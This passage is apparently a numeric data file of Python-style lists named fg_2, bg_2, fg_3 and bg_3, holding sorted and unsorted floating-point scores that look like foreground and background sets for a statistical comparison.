-1.23214383189408, -1.20420769047093, -1.19115956516894, -1.18850141299861, -1.18784132944629, -1.18312197985725, -1.18141103239185, -1.17198667518472, -1.1574473884479, -1.15547302875988, -1.15436184512092, -1.1492782786143, -1.14512772755633, -1.13333472235356, -1.13144201628438, -1.12758436826972, -1.1275262270534, -1.11604170754024, -1.11196663676282, -1.10653838735955, -1.10355835173696, -1.09426621454289, -1.08902293323313, -1.08230964724019, -1.08189678878143, -1.06947177159841, -1.06246750400604, -1.0507235919501, -1.04238716875262, -1.04002845756691, -1.03776283558259, -1.03100089406809, -1.02715039124769, -1.02482140105725, -1.01632881790586, -1.01264478082765, -1.00648174964558, -1.00572341041694, -0.995472313986702, -0.99256485331236, -0.988580000017022, -0.957848063220885, -0.93283578520007, -0.924828866057543, -0.921065089580478, -0.90090746786517, -0.880837749577085, -0.85245992296553, -0.847329067619522, -0.827499774943424, -0.825478162495361, -0.823005326357598, -0.820833134567771, -0.770283884793913, -0.72387440044806, -0.711615267900462, -0.689885884022624, -0.689530886654175, -0.657472831578137, -0.642788428086676, -0.607595078923237, -0.591722161954329, -0.492097069045875, -0.489076513247852, -0.477558238091107, -0.428102620439042, -0.338629448431751, -0.326670211958466, -0.324378464023917, -0.298708415917137, -0.209655625601901, -0.129565619268835, 0.0459296900675103, 0.138587255889901, 0.167122788074793, 0.250164879103255, 0.38805696412105, 0.388117026693325, 0.388226676241142, 0.46114992999589, 0.477397967012959, 0.515148585239905, 0.554924814842295, 0.563932128443976, 0.631964260977664, 0.653223377815047, 0.667694845910074, 0.710098342595984, 0.713170713096676, 0.717989916797078, 0.738811457761873, 0.739235071658754, 0.741557291838533, 0.743043353195949, 0.764158303808917, 0.785388077706216, 0.801267672769671, 0.805025125412237, 0.814814353247987, 0.819279873236768, 0.828760315586074, 0.841718725297425, 0.870852520173949, 0.885189968127755, 0.89381721250527, 0.909470630874892, 0.910520758770315, 0.917015818930873, 0.927323175823553, 0.938036977604359, 0.943106311822479, 0.946348078874905, 0.954635466126727, 0.960191098886339, 0.969856620706237, 0.983343741059723, 0.989355372568323, 0.992604751345429, 0.999630859191061, 1.00192707606825, 1.0091056926022, 1.00913072142497, 1.01400653547193, 1.0451369882041, 1.04720960248872, 1.04848874296014, 1.05206912241713, 1.06840533126208, 1.07177222565555, 1.07765601331905, 1.10044306508489, 1.14521855910075, 1.14721025372615, 1.15117176566609, 1.15368418944538, 1.17365742844115, 1.18232596918433, 1.20252852661979, 1.20690250131736, 1.21028709095634, 1.21334406479577, 1.21732093182956, 1.21801680712667, 1.22436923497591, 1.23329981994489, 1.25977675993613, 1.27576186496016, 1.28173932980657, 1.29279270197421, 1.29807749565535, 1.31514427140457, 1.32277216941972, 1.32309098256522, 1.33327008571054, 1.33832806064235, 1.34075883200151, 1.35250997801875, 1.3539830942859, 1.35850407702677, 1.36778649133896, 1.36862462149624, 1.37363355429464, 1.37484067333569, 1.38754529273882, 1.38872814665393, 1.39558125510676, 1.40814588149176, 1.44557822484993, 1.47530752297389, 1.48156311994824, 1.48401985822081, 1.49274700696083, 1.50033361885617, 1.50091286445433, 1.50346960183587, 1.50558135644419, 1.5274697562299, 1.53155647907915, 1.53603694612939, 1.54847718136891, 1.56878532698145, 1.57310643991257, 1.62162603796759, 1.62724662946682, 1.6311703892394, 1.63278022906532, 1.63286277246058, 1.6390052219977, 1.64216618713934, 1.64774594814051, 1.65108720634525, 1.65419548542931, 1.65507482456591, 1.65686713620059, 1.66119216987342, 1.66324387968644, 1.69538281930072, 1.69943010687876, 1.71835249991339, 1.72218624392784, 1.72665629108124, 1.7305415588152, 1.74247528855006, 1.75904901577023, 1.76789095742535, 1.77612709066103, 1.78511430654618, 1.79136198982229, 1.82142296458901, 1.82427659994177, 1.83141481960834, 1.83407792478098, 1.83507741652202, 1.84156822274656, 1.84604908108617, 1.85206282259832, 1.85501897137491, 1.85514726519441, 1.8725780583658, 1.8733110072085, 1.87702099485335, 1.8819786568054, 1.88653634536034, 1.88852330644768, 1.8922043980357, 1.92516259478729, 1.94267291353469, 1.98582750997238, 1.99285206337604, 1.99651440482193, 2.01260608164314, 2.01988206381339, 2.02654826883426, 2.03618133832892, 2.03962302659235, 2.0693423850561, 2.06986023383023, 2.07015511787096, 2.07981650099165, 2.09031096027266, 2.09794235989014, 2.10257313307331, 2.10283684013321, 2.11076677079529, 2.11345884319228, 2.11997846567281, 2.13480219730788, 2.13849594322748, 2.14014159423894, 2.14179613678729, 2.14546007755766, 2.15640334005494, 2.16179414876137, 2.18403438846943, 2.19811639987397, 2.20619657334253, 2.21422460341567, 2.21452378213307, 2.21627902918735, 2.22041612115193, 2.22517013985275, 2.22755164471054, 2.23416748291575, 2.24069215171696, 2.24153000593021, 2.25022483167014, 2.27827647213403, 2.28982723339836, 2.29243374383072, 2.30501805850302, 2.32158720203675, 2.32176742483064, 2.32178739485438, 2.331543058417, 2.3484316133167, 2.36610293793904, 2.36776511631972, 2.37491717417071, 2.37590849297063, 2.38261363024158, 2.44474259928041, 2.45065300086489, 2.45153772275136, 2.47214468657032, 2.53382334332036, 2.54913699632984, 2.56931454383761, 2.57045306287182, 2.57214556418502, 2.58536599752475, 2.58601242708292, 2.59658440428213, 2.60519113174386, 2.63014087680095, 2.64564991719137, 2.67922294868574, 2.69094444201124, 2.69378604148733, 2.70156045632584, 2.71355896020348, 2.72846673795643, 2.73273068190486, 2.74053944561202, 2.75646951941922, 2.77919130707459, 2.83037773693719, 2.85396841128117, 2.87189699646583, 2.87445930157727, 2.90438045626719, 2.90648625657812, 2.91629826551014, 2.92062296024744, 2.93240975984361, 2.95461889311079, 2.99659804937327, 3.00644546362766, 3.0401219204868, 3.10479018806494, 3.13048800094528, 3.13187383863909, 3.20422879636909, 3.21606576156584, 3.24892400229704, 3.46836466129959, 3.5775741166786, 3.58707758359076, 3.64691463194454, 3.67382885933952, 3.68153339403736, 3.7023603699075, 3.74797284255835, 3.76800916543556, 3.84570423193084, 4.01723852946342, 4.06951125405614, 4.11724952712395, 4.12817984248988, 4.20874721492816, 4.32576917599121, 4.63994743989415, 4.78808672479767, 4.8547560668931, 5.63873268099544]
fg_2 = [-2.42557735615568, -2.34507119777619, -4.99389860645012, -5.97435574341204, -6.36076969181797, -2.79596140349676, -6.38452118966051, -1.26076130475925, -1.68886993315355, -2.09468160013629, -4.76152297009406, -4.11415349374522, -1.292390189237, -3.11240135367784, -5.93251599928652, -5.13307999171822, -4.89244047976311, -6.86645118823921, -1.30612644055616, -5.77104152357156, -7.83801246222857, -7.91650311880841, -8.32643470076795, -4.26972319433717, -2.6591427901747, -1.96492470874042, -5.43024773291195, -3.83684112266378, -5.77316736458519, -2.60130128799689, -2.93432434536786, -4.60216228476108, -6.15346814841415, -5.25002227237239, -5.89125543330919, -5.58482481806554, -4.06467422195542, -5.80105853438803, -2.35541216581853, -5.3018475947231, -6.13426879717682, -4.41519434826907, -4.64096368709234, -4.55335737628244, -4.62230545208703, -4.63606798349776, -4.85596846974296, -5.20379059906394, -4.61119941428037, -6.25317971847765, -2.80867573129957, -5.87466394085314, -6.45986392537447, -6.08299484961717, -4.65427993822297, -4.54188476930851, -6.84855344412137, -6.41827521708809, -5.60733066321827, -6.85898908383128, -5.49985868979162, -6.69533136777946, -7.46651942330827, -4.76841931287922, -7.03089483430696, -4.06015133811765, -8.12926078021377, -3.96666702360362, -4.04635050515043, -3.71898137800479, -4.94830439636911, -4.01617685055156, -2.97765479033361, -2.66706478775549, -1.62971495288362, -1.71150902527557]
bg_2 = [-8.32643470076795, -8.12926078021377, -8.06480495716629, -7.91650311880841, -7.83801246222857, -7.70583778501837, -7.52738966855758, -7.49777367765364, -7.46651942330827, -7.42355926825873, -7.30100855923803, -7.26350122359286, -7.19468100328791, -7.13961252138971, -7.05545005462474, -7.03430813260908, -7.03089483430696, -7.02251373739152, -6.86645118823921, -6.85898908383128, -6.84855344412137, -6.76730879143088, -6.7664972463577, -6.69533136777946, -6.61277822936154, -6.58502157909065, -6.57284941377777, -6.48626842620612, -6.45986392537447, -6.441174858703, -6.41827521708809, -6.38452118966051, -6.36363468782975, -6.36076969181797, -6.26240701383164, -6.25317971847765, -6.2365389484951, -6.15648608681838, -6.15346814841415, -6.13426879717682, -6.08299484961717, -6.07448195514896, -6.07291813132705, -5.99612353985798, -5.98325289595672, -5.97435574341204, -5.95224905793447, -5.94667848489343, -5.9334583297072, -5.93251599928652, -5.89242499010306, -5.89125543330919, -5.87878829845967, -5.87466394085314, -5.8294477431172, -5.80105853438803, -5.77627544673249, -5.77570752439622, -5.77316736458519, -5.77104152357156, -5.73460384423021, -5.73224218231378, -5.71982626290828, -5.70008179669666, -5.69996938749922, -5.68781951940129, -5.64240743669934, -5.62788710170745, -5.60912454884795, -5.60733066321827, -5.58805534802067, -5.58482481806554, -5.5794352703236, -5.53619100793383, -5.5266917671331, -5.5013015283131, -5.49985868979162, -5.48514216653179, -5.47736351108885, -5.44794192762878, -5.44554285489525, -5.43436122520384, -5.43024773291195, -5.37874070417799, -5.37704368474112, -5.35464917492812, -5.34442189805867, -5.33991419491576, -5.32868519351564, -5.31778213754401, -5.30306045586955, -5.3018475947231, -5.30091946696228, -5.25002227237239, -5.20584852774195, -5.20379059906394, -5.17743188426567, -5.16932479991793, -5.15031174731268, -5.13724801369195, -5.13307999171822, -5.11070697893696, -5.10240145654282, -5.07286140986759, -5.02760949945728, -4.99389860645012, -4.99228153882051, -4.99158560578963, -4.98205158522702, -4.96403610389916, -4.96328578973434, -4.94830439636911, -4.93906291736347, -4.92474749895853, -4.92445006776066, -4.89244047976311, -4.88765714056338, -4.88446663436502, -4.85908698649547, -4.85596846974296, -4.85301720947498, -4.84994872577491, -4.82468714549179, -4.82093054094259, -4.81719423395266, -4.79960585993681, -4.79450958271145, -4.77593074310967, -4.76841931287922, -4.76152297009406, -4.73846761455964, -4.73556791826794, -4.7185781141044, -4.712204905786, -4.7085871626959, -4.65837612363627, -4.65427993822297, -4.64096368709234, -4.63976609134064, -4.63606798349776, -4.62230545208703, -4.61119941428037, -4.6101644135773, -4.60505070674488, -4.60216228476108, -4.56137108384481, -4.55919537628411, -4.55335737628244, -4.55119618911966, -4.54980192690798, -4.54762237714311, -4.54188476930851, -4.53663518485849, -4.53058010718047, -4.51933985531769, -4.48348483127313, -4.4789489171353, -4.47394478794731, -4.46774231867997, -4.44509259526265, -4.44393091915643, -4.41519434826907, -4.40567579039357, -4.38984168168106, -4.38016997298702, -4.35618957798525, -4.35084831820702, -4.35027464418738, -4.34908071042421, -4.32140309049286, -4.3026983120069, -4.28127018096359, -4.26972319433717, -4.26279848868902, -4.25560959729774, -4.25373930341165, -4.23797385436194, -4.23669738961331, -4.22149916876285, -4.18723301641402, -4.18190189283134, -4.18100834652305, -4.16968343025405, -4.14868010962359, -4.14457377659363, -4.14239705929054, -4.14047669165511, -4.11415349374522, -4.11135553123405, -4.10575170887277, -4.09232563163418, -4.09001981140879, -4.08683323132099, -4.06467422195542, -4.06015133811765, -4.05869532969368, -4.04635050515043, -4.03120132024633, -4.01617685055156, -3.96666702360362, -3.96111826986238, -3.96088412029899, -3.92779757574645, -3.92663168005016, -3.91628868482989, -3.90326485061218, -3.8902413394591, -3.88856013085311, -3.88853056225145, -3.88646320176686, -3.86721023073069, -3.86668849343774, -3.86148832472908, -3.86053574623235, -3.86008300380152, -3.83684112266378, -3.83282840214479, -3.81732132568477, -3.78993550268502, -3.78016445091877, -3.77412655275942, -3.77249249109146, -3.74057457477842, -3.73755650219373, -3.73226395329731, -3.72386617201012, -3.72021562121906, -3.71898137800479, -3.71465105176757, -3.70112389718105, -3.6727357100468, -3.65198571605545, -3.64391833103247, -3.6297016692636, -3.62810333515983, -3.608608201615, -3.58299251896378, -3.5821486739471, -3.57436950378065, -3.57244462966279, -3.56929711128091, -3.56414715368633, -3.5465551444108, -3.54574405303921, -3.54378507078218, -3.54374843954636, -3.53627979821756, -3.53243955993852, -3.5291363433243, -3.52643657837631, -3.52506369870443, -3.51789646877019, -3.51576723748925, -3.50927661941198, -3.50798217407424, -3.48539377978139, -3.47420239243753, -3.46141463323791, -3.46024518051199, -3.45973890216053, -3.45875555338156, -3.41725292690291, -3.41497199034076, -3.41104150037547, -3.39358717592219, -3.39213960981569, -3.38745902791139, -3.38348051871965, -3.37430019897601, -3.36031348867417, -3.34441155395612, -3.34229004818493, -3.32998660406781, -3.31605346212567, -3.30959669083528, -3.30698486763005, -3.30236924631106, -3.29820033833118, -3.29401239991304, -3.29346112379973, -3.29070668028697, -3.28648843706492, -3.27989558333408, -3.27691418241743, -3.27200608439279, -3.27058992995483, -3.26573893978849, -3.25113134851702, -3.24546302689538, -3.24467195487936, -3.23935453458173, -3.23110167819537, -3.2238276633626, -3.21674202072185, -3.20865216914659, -3.19892803116475, -3.18854086902297, -3.18423974989327, -3.18265949423004, -3.16870357712785, -3.16532353749055, -3.15622209295322, -3.1552324492251, -3.15395372424389, -3.15118990810437, -3.13021741861799, -3.12559133401462, -3.11240135367784, -3.11217628549985, -3.10828152469296, -3.10533515880712, -3.10308704679552, -3.09299592894098, -3.09093642543836, -3.09079988688351, -3.08997117150615, -3.07307851860216, -3.07210350144952, -3.06415790295611, -3.05788627034772, -3.05162979971371, -3.05078244282525, -3.05043285501393, -3.04950378251821, -3.0392394168758, -3.03511181367061, -3.0349059504027, -3.02833441418166, -3.025363962075, -3.01031424112599, -2.99641559568854, -2.98536912788274, -2.98489702593985, -2.98008594073884, -2.97765479033361, -2.97339459676949, -2.97027828134747, -2.96776098678398, -2.96512122723563, -2.96421529567905, -2.96251814148259, -2.95549465020861, -2.95408873676075, -2.95281226047047, -2.9344291340757, -2.93432434536786, -2.93002562218533, -2.92900680356523, -2.92694516038843, -2.92587242998372, -2.92503107366644, -2.92065571663921, -2.9110643721586, -2.89443532386475, -2.89442844994519, -2.86978685645832, -2.85943837208249, -2.85387228779441, -2.83373560028208, -2.83254376531638, -2.82702383493164, -2.82083700652804, -2.81850808228868, -2.80867573129957, -2.80781001620288, -2.80048681845322, -2.80032756014568, -2.79741968162439, -2.79596140349676, -2.78506132231634, -2.78284483026523, -2.7800802743299, -2.77780812004533, -2.76859332955662, -2.76224188325119, -2.74638852169022, -2.74189460920298, -2.74176761117359, -2.73705167951016, -2.73572136828971, -2.72884879914086, -2.72804003474724, -2.72802748955124, -2.72121307897118, -2.71132694596897, -2.7106737455993, -2.69221752992228, -2.6858838877386, -2.67936620209641, -2.67742461607703, -2.67522471223764, -2.67468122321351, -2.66706478775549, -2.66542815683533, -2.6638899973071, -2.6591427901747, -2.65449278371109, -2.6498856835267, -2.6468478815723, -2.64132067622366, -2.62703509095644, -2.62600762120414, -2.6255669632796, -2.62543650333752, -2.6248465982971, -2.62479477935021, -2.62156069698757, -2.6196490309563, -2.6189845962678, -2.61734717079125, -2.61395378406467, -2.60130128799689, -2.59894719086357, -2.59803358347537, -2.59268243788184, -2.5881980630896, -2.58650578537472, -2.58323535214077, -2.57377538537865, -2.56855584008607, -2.56732158394214, -2.5620420166921, -2.56155766302635, -2.55893433096706, -2.54877246832393, -2.54620547834289, -2.53769881863222, -2.52879229374978, -2.52689232596764, -2.5222870603308, -2.51900276142976, -2.50285674743039, -2.50031889131413, -2.4949158812924, -2.49139711942209, -2.48812939258639, -2.48383568506359, -2.47998929963482, -2.47588659071293, -2.47212391684667, -2.46868127491303, -2.4666390582227, -2.46268553769944, -2.45542879893428, -2.45313080031999, -2.45058338417446, -2.43997330504517, -2.4388147705156, -2.43675681357139, -2.43362585935822, -2.4320543755034, -2.43034015973118, -2.42975616820674, -2.4284167206258, -2.42840120325971, -2.42557735615568, -2.41752122107817, -2.41695562741707, -2.41469603158351, -2.40765091259847, -2.40099303490722, -2.39761029925005, -2.39143127517876, -2.38921730971439, -2.37354485968924, -2.37008913736568, -2.36907875332741, -2.36085587755146, -2.35541216581853, -2.35499775477767, -2.35483214155369, -2.35070694879604, -2.34524287183516, -2.34507119777619, -2.34349521897481, -2.33765735033273, -2.3302582533367, -2.32533368220489, -2.3130760663946, -2.30834983167064, -2.30614355271168, -2.30436640666394, -2.2959493427459, -2.29560949598717, -2.29415492436455, -2.28988219699669, -2.27987657429476, -2.26747189590981, -2.26728600354136, -2.26217920539588, -2.25995201153298, -2.25868195286177, -2.24643023228834, -2.24419337219989, -2.22646753427998, -2.2248842157761, -2.21857327985432, -2.21673728593081, -2.21105867150559, -2.20860428693124, -2.20703342922843, -2.20663361700686, -2.20583784790456, -2.19848235739652, -2.19315969555728, -2.19199814376301, -2.19073833511308, -2.17433630908843, -2.17346520150056, -2.16156703827477, -2.16073137533335, -2.15399869414511, -2.15258549410078, -2.14925922904975, -2.14499668676072, -2.14446876519314, -2.13380114327829, -2.13157357686132, -2.13152501741489, -2.12564373875284, -2.12083939056405, -2.11616109041893, -2.11533374684416, -2.1153073664903, -2.10681104845128, -2.10574664635352, -2.10277015776226, -2.1012183024032, -2.1004697087009, -2.09468160013629, -2.09149244560058, -2.08205219304469, -2.07685709593545, -2.07345361601096, -2.07211556813827, -2.05252517024539, -2.04934610492274, -2.04871672377998, -2.04670854627056, -2.0400029596935, -2.03931378429032, -2.03808888829879, -2.03375667864032, -2.03072390622845, -2.02359300958761, -2.01988602190739, -2.01474367779591, -2.00669398273574, -2.00354457486203, -1.99369290915384, -1.99024871387742, -1.98445859115386, -1.9821294855594, -1.97924778860837, -1.96692563333921, -1.96492470874042, -1.9644918223324, -1.96084409424985, -1.95320676156059, -1.93599010446892, -1.93441506584989, -1.9336134502564, -1.92805935288047, -1.9280244354887, -1.91901672737759, -1.91272578031586, -1.91150876386419, -1.90073423791214, -1.89957983020343, -1.88765495072017, -1.88622428890795, -1.88608611875168, -1.88531486347853, -1.87717273864848, -1.87658305870155, -1.87549862121653, -1.87073425916746, -1.86981225704331, -1.86872330459009, -1.86639491917143, -1.86529601002448, -1.86103342961632, -1.85776566863776, -1.84885822239558, -1.84457033937804, -1.84133858785801, -1.83923593052807, -1.83372921246915, -1.82417848446868, -1.82095539634476, -1.81888404766071, -1.81299618469462, -1.80668342478886, -1.80258262438383, -1.79870864312059, -1.79617739391335, -1.79598032193387, -1.79344908452896, -1.79246569229923, -1.79032319641819, -1.78872160656364, -1.78542927907352, -1.78492531186077, -1.78444022854041, -1.78298712630417, -1.78257525222681, -1.78066956692608, -1.77724586121844, -1.77603743244057, -1.77497437252417, -1.76432868130879, -1.76430636567513, -1.75838803509438, -1.75353711286565, -1.75307104343078, -1.75186748297339, -1.75169097375475, -1.74943505108089, -1.74866732133724, -1.7466271458849, -1.74620593433065, -1.74454422989634, -1.74449082726857, -1.73799975015413, -1.72817956395629, -1.72681720539307, -1.72553416973442, -1.7194947508813, -1.71809131961518, -1.71584421005811, -1.71459267042556, -1.71150902527557, -1.71142438616402, -1.70896476317588, -1.70724457088539, -1.7017517285505, -1.69998651599094, -1.69071358483784, -1.68920231264234, -1.68886993315355, -1.67714395258884, -1.66454274603339, -1.66290029197517, -1.65387857628297, -1.65242706346631, -1.65007686752239, -1.64979257195518, -1.64740574748032, -1.64478507070937, -1.63691527242944, -1.63541426577976, -1.6327064573579, -1.63265623866541, -1.63148041397343, -1.62971495288362, -1.62503259960895, -1.62280426560118, -1.61989195197603, -1.61039430903756, -1.60001928103155, -1.59717098280561, -1.59474711580785, -1.59455861619267, -1.59226994066529, -1.58219629028104, -1.58050160213268, -1.57554015279906, -1.57507155306422, -1.5732595618904, -1.571786907985, -1.56617034525202, -1.5630080754445, -1.55512318728101, -1.55174935433394, -1.54963968438918, -1.53477639911934, -1.53247120433308, -1.53241289360217, -1.53206025842873, -1.53014869245035, -1.5255748391867, -1.52499561770544, -1.52149753136422, -1.51907576624032, -1.51788004125355, -1.50196896772363, -1.49754270499549, -1.49752942111276, -1.49314621137239, -1.48357161450625, -1.47396214308553, -1.47087249010024, -1.46898302979973, -1.46611547540387, -1.46500561776518, -1.45595699028627, -1.45490778922291, -1.44350058978854, -1.44089317066432, -1.43555137796401, -1.42790013474591, -1.42177423917028, -1.41703537765471, -1.41404386184681, -1.40567571616606, -1.3993016143028, -1.39744741025476, -1.39650055236661, -1.38821615675844, -1.37981917491177, -1.34453217829785, -1.33543223554228, -1.32748620572223, -1.32619807482176, -1.32256908092003, -1.32086656554565, -1.31093958956234, -1.30612644055616, -1.30218378750615, -1.292390189237, -1.28624821180639, -1.2837370442399, -1.26135848707404, -1.26076130475925, -1.25880691794561, -1.25144698413725, -1.25040616920522, -1.24795259106321, -1.24462610121405, -1.23520396459594, -1.23258565931548, -1.23214383189408, -1.20420769047093, -1.19115956516894, -1.18850141299861, -1.18784132944629, -1.18312197985725, -1.18141103239185, -1.17198667518472, -1.1574473884479, -1.15547302875988, -1.15436184512092, -1.1492782786143, -1.14512772755633, -1.13333472235356, -1.13144201628438, -1.12758436826972, -1.1275262270534, -1.11604170754024, -1.11196663676282, -1.10653838735955, -1.10355835173696, -1.09426621454289, -1.08902293323313, -1.08230964724019, -1.08189678878143, -1.06947177159841, -1.06246750400604, -1.0507235919501, -1.04238716875262, -1.04002845756691, -1.03776283558259, -1.03100089406809, -1.02715039124769, -1.02482140105725, -1.01632881790586, -1.01264478082765, -1.00648174964558, -1.00572341041694, -0.995472313986702, -0.99256485331236, -0.988580000017022, -0.957848063220885, -0.93283578520007, -0.924828866057543, -0.921065089580478, -0.90090746786517, -0.880837749577085, -0.85245992296553, -0.847329067619522, -0.827499774943424, -0.825478162495361, -0.823005326357598, -0.820833134567771, -0.770283884793913, -0.72387440044806, -0.711615267900462, -0.689885884022624, -0.689530886654175, -0.657472831578137, -0.642788428086676, -0.607595078923237, -0.591722161954329, -0.492097069045875, -0.489076513247852, -0.477558238091107, -0.428102620439042, -0.338629448431751, -0.326670211958466, -0.324378464023917, -0.298708415917137, -0.209655625601901, -0.129565619268835, 0.0459296900675103, 0.138587255889901, 0.167122788074793, 0.250164879103255, 0.38805696412105, 0.388117026693325, 0.388226676241142, 0.46114992999589, 0.477397967012959, 0.515148585239905, 0.554924814842295, 0.563932128443976, 0.631964260977664, 0.653223377815047, 0.667694845910074, 0.710098342595984, 0.713170713096676, 0.717989916797078, 0.738811457761873, 0.739235071658754, 0.741557291838533, 0.743043353195949, 0.764158303808917, 0.785388077706216, 0.801267672769671, 0.805025125412237, 0.814814353247987, 0.819279873236768, 0.828760315586074, 0.841718725297425, 0.870852520173949, 0.885189968127755, 0.89381721250527, 0.909470630874892, 0.910520758770315, 0.917015818930873, 0.927323175823553, 0.938036977604359, 0.943106311822479, 0.946348078874905, 0.954635466126727, 0.960191098886339, 0.969856620706237, 0.983343741059723, 0.989355372568323, 0.992604751345429, 0.999630859191061, 1.00192707606825, 1.0091056926022, 1.00913072142497, 1.01400653547193, 1.0451369882041, 1.04720960248872, 1.04848874296014, 1.05206912241713, 1.06840533126208, 1.07177222565555, 1.07765601331905, 1.10044306508489, 1.14521855910075, 1.14721025372615, 1.15117176566609, 1.15368418944538, 1.17365742844115, 1.18232596918433, 1.20252852661979, 1.20690250131736, 1.21028709095634, 1.21334406479577, 1.21732093182956, 1.21801680712667, 1.22436923497591, 1.23329981994489, 1.25977675993613, 1.27576186496016, 1.28173932980657, 1.29279270197421, 1.29807749565535, 1.31514427140457, 1.32277216941972, 1.32309098256522, 1.33327008571054, 1.33832806064235, 1.34075883200151, 1.35250997801875, 1.3539830942859, 1.35850407702677, 1.36778649133896, 1.36862462149624, 1.37363355429464, 1.37484067333569, 1.38754529273882, 1.38872814665393, 1.39558125510676, 1.40814588149176, 1.44557822484993, 1.47530752297389, 1.48156311994824, 1.48401985822081, 1.49274700696083, 1.50033361885617, 1.50091286445433, 1.50346960183587, 1.50558135644419, 1.5274697562299, 1.53155647907915, 1.53603694612939, 1.54847718136891, 1.56878532698145, 1.57310643991257, 1.62162603796759, 1.62724662946682, 1.6311703892394, 1.63278022906532, 1.63286277246058, 1.6390052219977, 1.64216618713934, 1.64774594814051, 1.65108720634525, 1.65419548542931, 1.65507482456591, 1.65686713620059, 1.66119216987342, 1.66324387968644, 1.69538281930072, 1.69943010687876, 1.71835249991339, 1.72218624392784, 1.72665629108124, 1.7305415588152, 1.74247528855006, 1.75904901577023, 1.76789095742535, 1.77612709066103, 1.78511430654618, 1.79136198982229, 1.82142296458901, 1.82427659994177, 1.83141481960834, 1.83407792478098, 1.83507741652202, 1.84156822274656, 1.84604908108617, 1.85206282259832, 1.85501897137491, 1.85514726519441, 1.8725780583658, 1.8733110072085, 1.87702099485335, 1.8819786568054, 1.88653634536034, 1.88852330644768, 1.8922043980357, 1.92516259478729, 1.94267291353469, 1.98582750997238, 1.99285206337604, 1.99651440482193, 2.01260608164314, 2.01988206381339, 2.02654826883426, 2.03618133832892, 2.03962302659235, 2.0693423850561, 2.06986023383023, 2.07015511787096, 2.07981650099165, 2.09031096027266, 2.09794235989014, 2.10257313307331, 2.10283684013321, 2.11076677079529, 2.11345884319228, 2.11997846567281, 2.13480219730788, 2.13849594322748, 2.14014159423894, 2.14179613678729, 2.14546007755766, 2.15640334005494, 2.16179414876137, 2.18403438846943, 2.19811639987397, 2.20619657334253, 2.21422460341567, 2.21452378213307, 2.21627902918735, 2.22041612115193, 2.22517013985275, 2.22755164471054, 2.23416748291575, 2.24069215171696, 2.24153000593021, 2.25022483167014, 2.27827647213403, 2.28982723339836, 2.29243374383072, 2.30501805850302, 2.32158720203675, 2.32176742483064, 2.32178739485438, 2.331543058417, 2.3484316133167, 2.36610293793904, 2.36776511631972, 2.37491717417071, 2.37590849297063, 2.38261363024158, 2.44474259928041, 2.45065300086489, 2.45153772275136, 2.47214468657032, 2.53382334332036, 2.54913699632984, 2.56931454383761, 2.57045306287182, 2.57214556418502, 2.58536599752475, 2.58601242708292, 2.59658440428213, 2.60519113174386, 2.63014087680095, 2.64564991719137, 2.67922294868574, 2.69094444201124, 2.69378604148733, 2.70156045632584, 2.71355896020348, 2.72846673795643, 2.73273068190486, 2.74053944561202, 2.75646951941922, 2.77919130707459, 2.83037773693719, 2.85396841128117, 2.87189699646583, 2.87445930157727, 2.90438045626719, 2.90648625657812, 2.91629826551014, 2.92062296024744, 2.93240975984361, 2.95461889311079, 2.99659804937327, 3.00644546362766, 3.0401219204868, 3.10479018806494, 3.13048800094528, 3.13187383863909, 3.20422879636909, 3.21606576156584, 3.24892400229704, 3.46836466129959, 3.5775741166786, 3.58707758359076, 3.64691463194454, 3.67382885933952, 3.68153339403736, 3.7023603699075, 3.74797284255835, 3.76800916543556, 3.84570423193084, 4.01723852946342, 4.06951125405614, 4.11724952712395, 4.12817984248988, 4.20874721492816, 4.32576917599121, 4.63994743989415, 4.78808672479767, 4.8547560668931, 5.63873268099544]
fg_3 = [-5.3018475947231, -5.93251599928652, -5.89125543330919, -4.62230545208703, -4.99389860645012, -2.35541216581853, -6.13426879717682, -6.36076969181797, -3.11240135367784, -4.04635050515043, -1.26076130475925, -4.89244047976311, -6.86645118823921, -6.25317971847765, -2.6591427901747, -5.13307999171822]
bg_3 = [-8.32643470076795, -8.12926078021377, -8.06480495716629, -7.91650311880841, -7.83801246222857, -7.70583778501837, -7.52738966855758, -7.49777367765364, -7.46651942330827, -7.42355926825873, -7.30100855923803, -7.26350122359286, -7.19468100328791, -7.13961252138971, -7.05545005462474, -7.03430813260908, -7.03089483430696, -7.02251373739152, -6.86645118823921, -6.85898908383128, -6.84855344412137, -6.76730879143088, -6.7664972463577, -6.69533136777946, -6.61277822936154, -6.58502157909065, -6.57284941377777, -6.48626842620612, -6.45986392537447, -6.441174858703, -6.41827521708809, -6.38452118966051, -6.36363468782975, -6.36076969181797, -6.26240701383164, -6.25317971847765, -6.2365389484951, -6.15648608681838, -6.15346814841415, -6.13426879717682, -6.08299484961717, -6.07448195514896, -6.07291813132705, -5.99612353985798, -5.98325289595672, -5.97435574341204, -5.95224905793447, -5.94667848489343, -5.9334583297072, -5.93251599928652, -5.89242499010306, -5.89125543330919, -5.87878829845967, -5.87466394085314, -5.8294477431172, -5.80105853438803, -5.77627544673249, -5.77570752439622, -5.77316736458519, -5.77104152357156, -5.73460384423021, -5.73224218231378, -5.71982626290828, -5.70008179669666, -5.69996938749922, -5.68781951940129, -5.64240743669934, -5.62788710170745, -5.60912454884795, -5.60733066321827, -5.58805534802067, -5.58482481806554, -5.5794352703236, -5.53619100793383, -5.5266917671331, -5.5013015283131, -5.49985868979162, -5.48514216653179, -5.47736351108885, -5.44794192762878, -5.44554285489525, -5.43436122520384, -5.43024773291195, -5.37874070417799, -5.37704368474112, -5.35464917492812, -5.34442189805867, -5.33991419491576, -5.32868519351564, -5.31778213754401, -5.30306045586955, -5.3018475947231, -5.30091946696228, -5.25002227237239, -5.20584852774195, -5.20379059906394, -5.17743188426567, -5.16932479991793, -5.15031174731268, -5.13724801369195, -5.13307999171822, -5.11070697893696, -5.10240145654282, -5.07286140986759, -5.02760949945728, -4.99389860645012, -4.99228153882051, -4.99158560578963, -4.98205158522702, -4.96403610389916, -4.96328578973434, -4.94830439636911, -4.93906291736347, -4.92474749895853, -4.92445006776066, -4.89244047976311, -4.88765714056338, -4.88446663436502, -4.85908698649547, -4.85596846974296, -4.85301720947498, -4.84994872577491, -4.82468714549179, -4.82093054094259, -4.81719423395266, -4.79960585993681, -4.79450958271145, -4.77593074310967, -4.76841931287922, -4.76152297009406, -4.73846761455964, -4.73556791826794, -4.7185781141044, -4.712204905786, -4.7085871626959, -4.65837612363627, -4.65427993822297, -4.64096368709234, -4.63976609134064, -4.63606798349776, -4.62230545208703, -4.61119941428037, -4.6101644135773, -4.60505070674488, -4.60216228476108, -4.56137108384481, -4.55919537628411, -4.55335737628244, -4.55119618911966, -4.54980192690798, -4.54762237714311, -4.54188476930851, -4.53663518485849, 